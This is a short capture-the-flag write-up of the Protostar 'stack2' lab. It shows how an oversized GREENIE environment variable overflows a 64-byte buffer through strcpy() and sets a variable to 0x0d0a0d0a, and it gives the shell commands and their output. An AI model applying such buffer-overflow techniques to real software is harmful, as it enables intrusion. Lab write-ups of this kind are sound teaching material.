The goal of this challenge is to leverage a local variable to cause a BOF to overwrite the “modified” variable value to print the winning statement.
Things to note
variable = getenv("GREENIE");:
getenv()call will simply read the string value from local environment variable called “GREENIE.”
modified = 0: So the “modified” variable is hardcoded to 0.
strcpy(buffer, argv);: This is the vulnerable func of this program. It will copy the user supplied strings to a pointer; however, if the strings are bigger than the set buffer which is 64 bytes in this case (
char buffer;), the BOF will happen.
Setting Environment Variable
In Linux, you can set the environment variable and its value using a command called
$ export GREENIE='bigb0ss' # Setting Environment Variable
$ echo $GREENIE # Printing the value
When we set the environment variable value with less than 64 bytes, we will always get the output of “0x00000000”; however, if we set it with more than 64 bytes, it will cause a BOF and change the “modified” values.
$ export GREENIE='bigb0ss'
Try again, you got 0x00000000
$ export GREENIE=$(python -c 'print "A" * 70')
Try again, you got 0x41414141
Exploit workflow should be very simpler to
stack1. We need to find the offset value → overwrite the next instruction value with “0x0d0a0d0a.”
To find the offset,
$ export GREENIE=$(python -c 'print "A" * 60 + "BBBBCCCCDDDD"')
Try again, you got 0x43434343
The “modified” value is now overwritten with “0x43434343” (“0x43 = C); hence we know that the offset is 64 (60 + “BBBB”).
Next, using python convert the hex to ASCII.
Putting all together, let’s exploit the
stack2 and print out the winning statement. (Since it’s little-endian, we need to add those ASCII values in backward. “0x0d0a0d0a” → “\n\r\n\r”)
$ export GREENIE=$(python -c 'print "A" * 64 + "\n\r\n\r"')
you have correctly modified the variable
GDB (*Hand Writing)
Doing this by hand also helps better understanding of how the program operates. (Sorry for the water marks. Accidentally placed this on my kitchen table… -_-)
Thanks for reading!
- Stack 3 — Stack-based BOF: Basic 3